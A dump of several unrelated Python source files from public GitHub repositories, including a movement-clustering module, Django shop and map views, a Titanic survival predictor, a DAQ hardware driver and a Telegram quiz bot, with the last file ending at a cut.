voronoi_object=voronoi_obj,\n delaunay_object=delaunay_obj)\n\n data_groups_time[aid] = data_groups_time[aid].assign(\n convex_hull_volume=conv_hull_vol,\n voronoi_volume=voronoi_vol,\n )\n\n # Regroup data into DataFrame\n out_data = regrouping_data(data_groups_time)\n\n if group_output == False:\n return out_data\n\n else:\n pol = out_data\n pol = pol.loc[pol.animal_id ==\n list(set(pol.animal_id))[0], :].reset_index(drop=True)\n return pol.loc[:,['time', 'convex_hull_object', 'voronoi_object','delaunay_object', 'convex_hull_volume','voronoi_volume']]\n\ndef get_group_data(preprocessed_data):\n \"\"\"\n Helper function to get all group data at one place.\n :param preprocessed_data: pandas DataFrame, containing preprocessed movement records.\n :return: pd DataFrame containing all relevant group variables\n \"\"\"\n movement = centroid_medoid_computation(preprocessed_data)\n # prepare for merge\n movement = movement.rename(\n columns={'distance_to_centroid': 'distance_centroid'})\n\n # Take subset from dataset above, focusing only on group-level\n group = movement.loc[\n movement.animal_id == list(set(movement.animal_id))[0],\n ['time', 'x_centroid', 'y_centroid', 'medoid']].reset_index(drop=True)\n\n # 
compute polarization\n pol = compute_polarization(preprocessed_data, group_output=True).fillna(0)\n\n # compute mean speed, acceleration and mean distance to centroid\n mov = group_movement(movement).fillna(0)\n\n # compute centroid direction\n cen_dir = compute_centroid_direction(movement, group_output=True).fillna(0)\n\n # merge computed values into group-dataframe\n data_frames = [group, pol, mov, cen_dir]\n group = reduce(\n lambda left, right: pd.merge(left, right, on=['time'], how='left'),\n data_frames)\n return group\n\n\ndef clustering(algorithm, data, **kwargs):\n \"\"\"\n Clustering of spatio-temporal data.\n :param algorithm: Choose between dbscan, hdbscan, agglomerative, kmeans, optics, spectral, affinitypropagation, birch.\n :param data: DataFrame to perform clustering on.\n :return: labels as numpy array where the label in the first position corresponds to the first row of the input data.\n \"\"\"\n if algorithm == 'dbscan':\n clusterer = stc.ST_DBSCAN(**kwargs)\n elif algorithm == 'hdbscan':\n clusterer = stc.ST_HDBSCAN(**kwargs)\n elif algorithm == 'agglomerative':\n clusterer = stc.ST_Agglomerative(**kwargs)\n #elif algorithm == 'kmeans':\n # clusterer = stc.ST_KMeans(**kwargs)\n elif algorithm == 'optics':\n clusterer = stc.ST_OPTICS(**kwargs)\n elif algorithm == 'spectral':\n clusterer = stc.ST_SpectralClustering(**kwargs)\n elif algorithm == 'affinitypropagation':\n clusterer = stc.ST_AffinityPropagation(**kwargs) \n #elif algorithm == 'birch':\n # clusterer = stc.ST_BIRCH(**kwargs)\n else:\n raise ValueError('Unknown algorithm. Choose between dbscan, hdbscan, agglomerative, optics, spectral, affinitypropagation.')\n\n if not is_numeric_dtype(data['time'][0]): # if time format not integer\n grouped_data = data.groupby('time')\n keys = []\n for key in grouped_data.groups.keys():\n keys.append(key)\n time_distance = keys[1] - keys[0]\n\n for i in range(1, len(keys)): # check if time is equidistant\n if keys[i] - keys[i - 1] != time_distance:\n warnings.warn('As difference between timestamps is not equidistant, clustering of this data is not supported by movekit at the moment.')\n return\n\n # convert time to integer\n time_values = np.array(data['time'])\n time_values = np.unique(time_values)\n indices = np.sort(time_values)\n converter = {}\n for i in range(len(time_values)):\n converter[indices[i]] = i\n data = data.replace({'time': converter})\n\n if presence_3d(data):\n data = data.loc[:, ['time','x','y','z']].values\n else:\n data = data.loc[:, ['time','x','y']].values\n\n clusterer.st_fit(data)\n return clusterer.labels\n \n \n\ndef clustering_with_splits(algorithm, data, frame_size, **kwargs):\n \"\"\"\n Clustering of spatio-temporal data.\n :param algorithm: Choose between dbscan, hdbscan, agglomerative, optics, spectral, affinitypropagation.\n :param data: DataFrame to perform clustering on.\n :param frame_size: the dataset is partitioned into frames and merged afterwards.\n :return: labels as numpy array where the label in the first position corresponds to the first row of the input data.\n \"\"\"\n if algorithm == 'dbscan':\n clusterer = stc.ST_DBSCAN(**kwargs)\n elif algorithm == 'hdbscan':\n clusterer = stc.ST_HDBSCAN(**kwargs)\n elif algorithm == 'agglomerative':\n clusterer = stc.ST_Agglomerative(**kwargs)\n #elif algorithm == 'kmeans':\n # clusterer = stc.ST_KMeans(**kwargs)\n elif algorithm == 'optics':\n clusterer = stc.ST_OPTICS(**kwargs)\n elif algorithm == 'spectral':\n clusterer = stc.ST_SpectralClustering(**kwargs)\n elif algorithm == 
'affinitypropagation':\n        clusterer = stc.ST_AffinityPropagation(**kwargs) \n    #elif algorithm == 'birch':\n    #    clusterer = stc.ST_BIRCH(**kwargs)\n    else:\n        raise ValueError('Unknown algorithm. Choose between dbscan, hdbscan, agglomerative, optics, spectral, affinitypropagation.')\n\n    if not is_numeric_dtype(data['time'][0]):  # if time format not integer\n        grouped_data = data.groupby('time')\n        keys = []\n        for key in grouped_data.groups.keys():\n            keys.append(key)\n        time_distance = keys[1] - keys[0]\n\n        for i in range(1, len(keys)):  # check if time is equidistant\n            if keys[i] - keys[i - 1] != time_distance:\n                warnings.warn(\n                    'As difference between timestamps is not equidistant, clustering of this data is not supported by movekit at the moment.')\n                return\n\n        # convert time to integer\n        time_values = np.array(data['time'])\n        time_values = np.unique(time_values)\n        indices = np.sort(time_values)\n        converter = {}\n        for i in range(len(time_values)):\n            converter[indices[i]] = i\n        data = data.replace({'time': converter})\n\n    if presence_3d(data):\n        data = data.loc[:, ['time','x','y','z']].values\n    else:\n        data = data.loc[:, ['time','x','y']].values\n    clusterer.st_fit_frame_split(data, frame_size)  # percentage bar not possible\n    return clusterer.labels\n","repo_name":"dbvis-ukon/movekit","sub_path":"src/movekit/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":20251,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"70882605212","text":"from django.shortcuts import render\nfrom django.http import Http404\nfrom django.core.urlresolvers import reverse, NoReverseMatch\n\n\n# view should be the name of the url from the rest api\ndef map_view(request, view='pops', city=None, location=None):\n    if view:\n        try:\n            # raise Exception\n            if city:\n                if location:\n                    url = reverse('api:' + view, args=(city, location,))\n                else:\n                    url = reverse('api:' + view, args=(city,))\n            else:\n                url = reverse('api:' + view)\n        except NoReverseMatch:\n            raise Http404\n    if request.GET.get('tag'):\n        return render(request, 'pops/map.html', {'view': '%s?tag=%s' % (url, request.GET.get('tag')), 'filter': request.GET.get('tag')})\n    else:\n        return render(request, 'pops/map.html', {'view': url})\n","repo_name":"grnet/pops","sub_path":"views/pops_views.py","file_name":"pops_views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71689222491","text":"'''\n    Load test cases from an Excel workbook\n'''\nimport sys\nimport openpyxl\n\n\ndef open_case_excel(file_name='../datas/demo.xlsx'):\n    case_list = []\n\n    wb = openpyxl.load_workbook(file_name)  # open the Excel workbook\n    sheet = wb['demo']\n    print(sheet.max_row)  # maximum number of rows\n    print(sheet.max_column)  # maximum number of columns\n\n    # read the parameter headers from the first row\n    case_key = []\n    for i in range(1, sheet.max_column + 1):\n        case_key.append(sheet.cell(1, i).value)\n\n    # collect each case row from the sheet into a list of dicts\n    row = 2\n    while row <= sheet.max_row:\n        case_row = {}\n        for i in range(1, sheet.max_column + 1):\n            case_row[case_key[i - 1]] = sheet.cell(row, i).value\n        case_list.append(case_row)\n        row += 1\n\n    # build the tuple collection used for pytest parametrization\n    test_case_list = []\n    for i in range(0, len(case_list)):\n        case = (\n            case_list[i]['method'],\n            case_list[i]['api'],\n            (case_list[i]['request_params']),\n            (case_list[i]['request_data']),\n            (case_list[i]['headers'])\n        )\n        test_case_list.append(case)\n    return test_case_list\n\n\nif __name__ == \"__main__\":\n    file_name = str(sys.argv[1])\n    
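# example invocation (hypothetical path): python case_to_excel.py ../datas/demo.xlsx\n    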
open_case_excel(file_name)\n","repo_name":"Jaden-Yu/pytest_test","sub_path":"scripts/api_test/model/case_to_excel.py","file_name":"case_to_excel.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70152827293","text":"import matplotlib.pyplot as plt\nimport normalization\nimport numpy as np\nimport gradient_descent\n\ndef display_predictions(thetas, dataX):\n for i in range(len(dataX)):\n p = thetas[0] + thetas[1] * dataX[i]\n print(\"dataX[\" + str(i) + \"] = \" + str(dataX[i]) + \" & prediction = \" + str(p))\n print(\"\")\n\ndef start_output(raw_dataX, raw_dataY, X, Y, theta, Normalize):\n if Normalize == True:\n tmp_X, tmp_Y, t = normalization.denormalize(raw_dataX, raw_dataY, X.copy(), Y.copy(), theta.copy(), True)\n c = gradient_descent.cost_function(tmp_X, tmp_Y, t)\n else:\n c = gradient_descent.cost_function(X, Y, theta)\n t = theta\n print(\"Starting t0 = \" + str(t[1][0]) + \"\\nStarting t1 = \" + str(t[0][0]))\n print(\"Cost = \" + str(c) + \"\\n\")\n\ndef end_output(theta, cost, X, Display_predictions):\n print(\"Finished gradient descent !\\n\")\n if (Display_predictions == True):\n print(\"Model predictions :\")\n print(X.dot(theta))\n print(\"Final t0 = \" + str(theta[1][0]))\n print(\"Final t1 = \" + str(theta[0][0]))\n print(\"Cost = \" + str(cost))\n\ndef display_graph(dataX, dataY, all_predictions, Display_graph):\n if Display_graph == True:\n plt.scatter(dataX, dataY, c='k')\n plt.plot(dataX, all_predictions[0], c='r')\n plt.plot(dataX, all_predictions[1], c='y')\n plt.plot(dataX, all_predictions[2], c='g')\n plt.show()","repo_name":"alacrois/42-ft_linear_regression","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24131936797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 9 14:56:33 2019\n@author: spidey\n\"\"\"\n\nimport cv2\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"test\")\n'''\ndef gstreamer_pipeline (capture_width=1280, capture_height=1080, display_width=800, display_height=600, framerate=30, flip_method=0) : \n return ('nvarguscamerasrc ! ' \n 'video/x-raw(memory:NVMM), '\n 'width=(int)%d, height=(int)%d, '\n 'format=(string)NV12, framerate=(fraction)%d/1 ! '\n 'nvvidconv flip-method=%d ! '\n 'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! '\n 'videoconvert ! '\n 'video/x-raw, format=(string)BGR ! 
appsink' % (capture_width,capture_height,framerate,flip_method,display_width,display_height))\n'''\n#cap = cv2.VideoCapture(gstreamer_pipeline(flip_method=0), cv2.CAP_GSTREAMER)\nimg_counter = 0\n\nwhile True:\n ret, frame = cam.read()\n frame=cv2.rotate(frame, cv2.ROTATE_180)\n cv2.imshow(\"test\", frame)\n if not ret:\n break\n k = cv2.waitKey(1)\n\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n elif k%256 == 32:\n # SPACE pressed\n img_name = \"opencv_frame_{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\ncam.release()\n\ncv2.destroyAllWindows()","repo_name":"bathonSpidey/RaspberryFiles","sub_path":"all_codes/Sign Detection/click_pic.py","file_name":"click_pic.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4743315353","text":"def main():\n matriz = []\n nlin = int(input(\"Digite o numero de linhas da matriz: \"))\n ncol = int(input(\"Digite o numero de colunas da matriz: \"))\n carrega_matriz(matriz, nlin, ncol)\n print(f\"A média dos elementos da matriz é {calcula_media_matriz (matriz,nlin,ncol):.2f}\")\n exibe_impares(matriz, nlin, ncol)\n\n\n\ndef carrega_matriz (matriz,nlin,ncol):\n for lin in range (nlin):\n linha = []\n for col in range (ncol):\n linha.append(int(input(\"Digite o elemento da matriz: \")))\n matriz.append(linha)\n\ndef calcula_media_matriz (matriz,nlin,ncol):\n soma = 0\n for lin in range (nlin):\n for col in range (ncol):\n soma+=matriz[lin][col]\n\n media = soma / (nlin * ncol)\n return (media)\n\ndef exibe_impares (matriz,nlin,ncol):\n for lin in range (nlin):\n for col in range (ncol):\n if (matriz[lin][col] % 2 != 0):\n print(matriz[lin][col])\n\nif (__name__ == \"__main__\"):\n main()","repo_name":"gabrielgirami2/Python","sub_path":"revisao_funcoes/exemplos_funcoes/programas/exercicios/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870845558","text":"import sys\nimport requests\nimport traceback\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import authentication, permissions\nfrom rest_framework.authentication import SessionAuthentication\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth import get_user_model, authenticate, logout, login\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom django.db import transaction\nfrom shopapp.models import CustomUser, UserType, Product, Cart, Order, ProductRating\nfrom django.shortcuts import render, redirect\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom ..serializers import (\n CustomerSerializer,\n CreateCustomerSerializer,\n CustomerProductListSerializer,\n CustomerCartSerializer,\n CustomerOrderProductSerializer,\n CustomerOrderListSerializer,\n)\n\nfrom ..services import (\n create_customer,\n create_order,\n)\n\n\nclass CustomerLoginAPI(APIView):\n \"\"\"API for Admin Login.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n def post(self, request):\n serializer = CustomerSerializer(data=request.data)\n if serializer.is_valid():\n 
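# authenticate() verifies the submitted password against Django's hashed credentials; login() then binds the user to the session\n            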
username = serializer.validated_data['username']\n password = serializer.validated_data['password']\n user = authenticate(request, username=username, password=password)\n if user is not None and user.user_type == UserType.CUSTOMER:\n # Login successful, return user data\n login(request, user)\n data = {\n \"Success\": True,\n \"msg\": \"Login Success\",\n }\n return Response(status=status.HTTP_201_CREATED, data=data)\n # return redirect(\"shopapp:customer_list\") \n else:\n # Login failed\n return Response({'error': 'Invalid login credentials'}, status=status.HTTP_401_UNAUTHORIZED)\n else:\n # Invalid data\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n\n\nclass CustomerLogOutAPI(APIView):\n \"\"\"API for Logout.\"\"\"\n def get(self, request):\n logout(request)\n return redirect(\"shopapp:customer_login\") \n\n\nclass CustomerRegisterAPI(APIView):\n \"\"\"API for creating User\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n def post(self, request):\n try:\n serializer = CreateCustomerSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n with transaction.atomic():\n create_customer(**serializer.validated_data)\n return Response(status=status.HTTP_201_CREATED, data=_(\"User created succesfully.\"))\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"User Registration Failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerProductListAPI(APIView):\n \"\"\"API for getting Product list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n try:\n result = Product.objects.all().values(\"id\", \"name\", \"description\", \"price\").order_by(\"-created_date\")\n serializer = CustomerProductListSerializer(result, many=True)\n return Response(status=status.HTTP_200_OK, data=serializer.data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"List getting failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass AddtoCartAPI(APIView):\n \"\"\"API for adding to cart.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request, id):\n product = Product.objects.get(pk=id)\n cart, _ = Cart.objects.get_or_create(user=request.user)\n cart.products.add(product)\n return Response({'message': 'Product added to cart'}) \n\n\nclass CustomerCartViewAPI(APIView):\n \"\"\"API for getting Cart list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n cart, _ = Cart.objects.get_or_create(user=request.user)\n serializer = CustomerCartSerializer(cart)\n return Response(serializer.data) \n\n\nclass CustomerOrderProductAPI(APIView):\n \"\"\"API for creating order for Customer\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n try:\n serializer = CustomerOrderProductSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n 
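# run the order creation atomically so that a failure inside create_order() rolls back any partial writes\n            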
with transaction.atomic():\n create_order(user=user, **serializer.validated_data)\n data = {\n \"Success\": True,\n \"msg\": \"New order created.\",\n }\n return Response(status=status.HTTP_200_OK, data=data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"Creating order failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerOrderListAPI(APIView):\n \"\"\"API for getting order list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n try:\n result = Order.objects.filter(user=user).values(\"id\", \"product__name\", \"status\", \"quantity\").order_by(\"-created_date\")\n serializer = CustomerOrderListSerializer(result, many=True)\n return Response(status=status.HTTP_200_OK, data=serializer.data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"List getting failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerProductReviewAPI(APIView):\n \"\"\"API for product review.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request, id):\n product = Product.objects.get(pk=id)\n rating = request.data.get('rating', 0)\n ProductRating.objects.create(user=request.user, product=product, rating=rating)\n return Response({'message': 'Product rated successfully'}) ","repo_name":"Shanidh/shop","sub_path":"shopapp/apis/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20847056747","text":"\"\"\"Drivers for National Instrument hardware.\n\nThe materials supported is the one supported by NI-DAQmx on Windows and\ncomedi on Linux.\n\nNote:\n - The driver depends on `pycomedi `_\n on Linux or `PyLibNIDAQmx `_\n on Windows.\n - The driver requires `numpy` on all platform.\n\nReference:\n - `NI-DAQmx Software `_\n - `comedi `_\n\n\"\"\"\nimport sys\n\nif sys.platform == \"linux2\":\n from lindaq import DioProtocol, AioProtocol\nelse:\n from windaq import DioProtocol\n from windaq import VoltageAioProtocol as AioProtocol\n\nimport pyhard2.driver as drv\nAccess = drv.Access\n\n\n# NI 622x range | precision\n# -10.0 to +10.0 V -> 320 muV\n# -5.0 to +5.0 V -> 160 muV\n# -1.0 to +1.0 V -> 32 muV\n# -0.2 to +0.2 V -> 6.4 muV\n\n\nclass Cmd(drv.Command):\n\n \"\"\"`Command` without `reader`.\"\"\"\n\n class Context(drv.Context):\n\n \"\"\"`Context` with `minimum` and `maximum` attributes.\"\"\"\n\n def __init__(self, command, value=None, node=None):\n super(Cmd.Context, self).__init__(command, value, node)\n self.minimum = command.minimum\n self.maximum = command.maximum\n\n def __init__(self, **kwargs):\n super(Cmd, self).__init__(reader=None, **kwargs)\n\n\nclass Subsystem(drv.Subsystem):\n\n \"\"\"A subsytem with a `device` attribute.\n\n Args:\n device (string): The device name.\n\n \"\"\"\n def __init__(self, device, parent=None):\n super(Subsystem, self).__init__(parent)\n self.device = device\n\n\nclass 
Daq(drv.Subsystem):\n\n \"\"\"Driver for DAQ hardware.\n\n On windows, the node names are ``portN/lineM`` for the digital\n in/out channels and ``aiN`` or ``aoN`` for the analog input and\n output.\n\n On linux, the node names are ``SUBDEVICE.CHANNEL``, that is the\n number of the `subdevice` and of the `channel` separated with a dot\n ``.``.\n\n Args:\n device (str): The name of the device on windows or its address\n (example ``/dev/comedi0``) on linux.\n\n .. graphviz:: gv/Daq.txt\n\n Example:\n NI 622x cards have following nodes:\n\n - 32 AI channels: ai[0-31]\n - 4 AO channels: ao[0-3]\n - 32 DIO channels on port0: port0/line[0-31]\n - 8 DIO channels on port1: port1/line[0-7]\n - 8 DIO channels on port2: port2/line[0-7]\n\n Use as follows\n\n >>> driver = Daq(\"NAME\") # The actual device name\n >>> driver.state.read(\"port0/line3\") # windows names\n ... False\n >>> driver.state.write(True, \"port0/line3\")\n >>> driver.state.read(\"port0/line3\")\n ... True\n >>> driver.voltage.ai.read(\"ai0\")\n ... 0.5\n >>> driver.voltage.ao.write(1.0, \"ao0\")\n\n \"\"\"\n def __init__(self, device, parent=None):\n super(Daq, self).__init__(parent)\n self.digitalIO = Subsystem(device, self)\n self.digitalIO.setProtocol(DioProtocol(self))\n self.digitalIO.state = Cmd(rfunc=bool, access=Access.RW)\n self.voltage = Subsystem(device, self)\n self.voltage.setProtocol(AioProtocol(self))\n self.voltage.ai = Cmd(minimum=-10, maximum=10, access=Access.RO)\n self.voltage.ao = Cmd(minimum=-10, maximum=10, access=Access.WO)\n\n","repo_name":"Synss/pyhard2","sub_path":"pyhard2/driver/daq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4709208923","text":"import pandas as pd\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torch.nn as nn\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n# Loading the Test Dataset\r\ndata = pd.read_csv('Titanic/Data/test.csv')\r\nsubmission = data\r\n\r\n# Dropping Columns that we are guess are irrelevant\r\ndata = data.drop(['Name', 'Ticket', 'Cabin'], axis=1)\r\nsubmission = submission.drop(['Pclass', 'Name', 'Sex', 'Age',\r\n 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'], axis=1)\r\n\r\n# Giving Sex and Embarked Numerical Values\r\ndata[\"Sex\"] = data[\"Sex\"].astype('category').cat.codes\r\ndata[\"Embarked\"] = data[\"Embarked\"].astype('category').cat.codes\r\n\r\n# Replacing Entries with Missing Elements with The Median\r\ndata = data.apply(pd.to_numeric, errors='coerce')\r\ndata = data.fillna(data.mean())\r\n\r\n# Exclude the PassengerId Column\r\ndata = data.iloc[:, 1:]\r\n\r\nprint(data.head())\r\n\r\n# Standardize Input\r\nscaler = StandardScaler()\r\ninput = scaler.fit_transform(data)\r\n\r\nx = data.iloc[:, 1:-1]\r\n\r\n# Ensure PyTorch is Using our GPU\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nprint('Device: ' + str(device))\r\n\r\n\r\nclass testData(Dataset):\r\n def __init__(self, X_data):\r\n self.X_data = X_data\r\n\r\n def __getitem__(self, index):\r\n return self.X_data[index]\r\n\r\n def __len__(self):\r\n return len(self.X_data)\r\n\r\n\r\ntest_data = testData(torch.FloatTensor(input))\r\n\r\n# Initialize the Dataloaders\r\ntest_loader = DataLoader(dataset=test_data, batch_size=1)\r\n\r\nLAYER_NODES = 6\r\n\r\n# Define our Neural Network Architecture\r\n\r\n\r\nclass binaryClassification(nn.Module):\r\n def __init__(self):\r\n 
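# architecture: 7 engineered input features feed two hidden layers of LAYER_NODES units and a single output logit\r\n        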
super(binaryClassification, self).__init__()\r\n        # Number of input features is 7.\r\n        self.layer_1 = nn.Linear(7, LAYER_NODES)\r\n        self.layer_2 = nn.Linear(LAYER_NODES, LAYER_NODES)\r\n        self.layer_out = nn.Linear(LAYER_NODES, 1)\r\n\r\n        self.relu = nn.ReLU()\r\n        self.dropout = nn.Dropout(p=0.2)\r\n        self.batchnorm1 = nn.BatchNorm1d(LAYER_NODES)\r\n        self.batchnorm2 = nn.BatchNorm1d(LAYER_NODES)\r\n\r\n    def forward(self, inputs):\r\n        x = self.relu(self.layer_1(inputs))\r\n        x = self.batchnorm1(x)\r\n        x = self.relu(self.layer_2(x))\r\n        x = self.batchnorm2(x)\r\n        x = self.dropout(x)\r\n        x = self.layer_out(x)\r\n\r\n        return x\r\n\r\n\r\n# Load our Trained Model\r\nmodel = torch.load('Titanic/trained_model')\r\nmodel.to(device)\r\n\r\n# Testing our Model\r\ny_pred_list = []\r\nmodel.eval()\r\n\r\nwith torch.no_grad():\r\n    for X_batch in test_loader:\r\n        X_batch = X_batch.to(device)\r\n        y_test_pred = model(X_batch)\r\n        y_test_pred = torch.sigmoid(y_test_pred)\r\n        y_pred_tag = torch.round(y_test_pred)\r\n        y_pred_list.append(y_pred_tag.cpu().numpy())\r\n\r\ny_pred_list = [int(a.squeeze().tolist()) for a in y_pred_list]\r\n\r\n# Save Our Results into The Submission DataFrame and to CSV\r\nsubmission.insert(len(submission.columns), 'Survived', y_pred_list)\r\nsubmission.to_csv('Titanic/Data/Submission.csv', index=False)\r\nprint(submission.head())\r\nprint(submission.shape)\r\n","repo_name":"camandrewz/TitanicML","sub_path":"Code/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72043175130","text":"import os\nimport logging\n\nfrom CreateQuestions import Interviewer\nfrom SaveChatID import set_chat_id, set_url, set_inspect_answer, check_data\nimport psycopg2\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.utils import executor\nfrom dotenv import load_dotenv\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\n\nfrom ParsSite import Parser\nconn = psycopg2.connect(\n    host=\"localhost\",\n    port=\"5432\",\n    database=\"postgres\",\n    user=\"postgres\",\n    password=\"root\")\n# Create a cursor for working with the database\ncur = conn.cursor()\n\n\nstorage = MemoryStorage()\n\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\ndef markup(answers):\n    # Create the buttons\n    markup = ReplyKeyboardMarkup(resize_keyboard=True)\n\n    if answers:\n        button1 = KeyboardButton(answers[0])\n        button2 = KeyboardButton(answers[1])\n        button3 = KeyboardButton(answers[2])\n        button4 = KeyboardButton(answers[3])\n        markup.row(button1, button2)\n        markup.row(button3, button4)\n\n    button5 = KeyboardButton('/start')\n    button6 = KeyboardButton('/question')\n    button7 = KeyboardButton('/data')\n    button8 = KeyboardButton('/help')\n\n    markup.row(button6, button7, button5, button8)\n    return markup\n\n# Build the keyboard with buttons\n\nload_dotenv()  # load variables from the .env file\nTOKEN = os.getenv('TOKEN')  # get the value of the TOKEN variable\n\n# Set the logging level\nlogging.basicConfig(level=logging.INFO)\n\n# Create the bot object\nbot = Bot(token=TOKEN)\n\n# Create the dispatcher object\ndp = Dispatcher(bot, storage=storage)\n\n# Handler for the /start command\n@dp.message_handler(commands=['start'])\nasync def send_welcome(message: types.Message, state: FSMContext):\n    await state.finish()\n    await set_chat_id(message, conn=conn, cur=cur)\n    await message.reply(\"Hi! I am a bot that can ask you questions.\")\n    await bot.send_message(message.chat.id, \"Choose an action\", reply_markup=markup(False))\n    await message.delete()\n\n\n# Handler for the /question command\n@dp.message_handler(commands=['question'])\nasync def process_question_command(message: types.Message):\n    await set_chat_id(message, conn=conn, cur=cur)\n    # Pick a random question from the list\n    question = Interviewer().question(message)\n    Interviewer().log_question(question)\n    # Build a message with the question and the answer options\n    text = f\"{question['question']}\"\n    await message.answer(text)\n    await bot.send_message(message.chat.id, \"Enter your answer:\", reply_markup=markup(question['options']))\n    await dp.current_state(chat=message.chat.id, user=message.from_user.id).set_state('waiting_for_answer')\n    await dp.current_state(chat=message.chat.id, user=message.from_user.id).update_data(question=question)\n\n# Handler for the answer to a question\n@dp.message_handler(state='waiting_for_answer')\nasync def process_answer(message: types.Message, state: FSMContext):\n    await set_chat_id(message, conn=conn, cur=cur)\n    # Get the user's context\n    data = await state.get_data()\n    question = data['question']\n    # Check the user's answer\n    if message.text == question['answer']:\n        await set_inspect_answer(id_user=message.chat.id, answer=question['answer'], right=True, conn=conn, cur=cur)\n        await message.answer(\"Correct!\")\n    else:\n        await set_inspect_answer(id_user=message.chat.id, answer=question['answer'], right=False, conn=conn, cur=cur)\n        await message.answer(f\"Wrong, the right answer is {question['answer']}\")\n    await state.finish()\n\n@dp.message_handler(commands=['data'])\nasync def request_data(message: types.Message):\n    await set_chat_id(message, conn=conn, cur=cur)\n    await message.reply(\"Let's load the text to translate (for now I can only accept a site URL, but I will get better soon :))\")\n    await dp.current_state(chat=message.chat.id, user=message.from_user.id).set_state('waiting_data')\n    await message.delete()\n\n@dp.message_handler(state='waiting_data')\nasync def process_download(message: types.Message, state: FSMContext):\n    await set_url(message, conn=conn, cur=cur)\n    await state.finish()\n\ndef main():\n    try:\n        executor.start_polling(dp, skip_updates=True)\n    finally:\n        cur.close()\n        conn.close()\n# Start the bot\nif __name__ == '__main__':\n    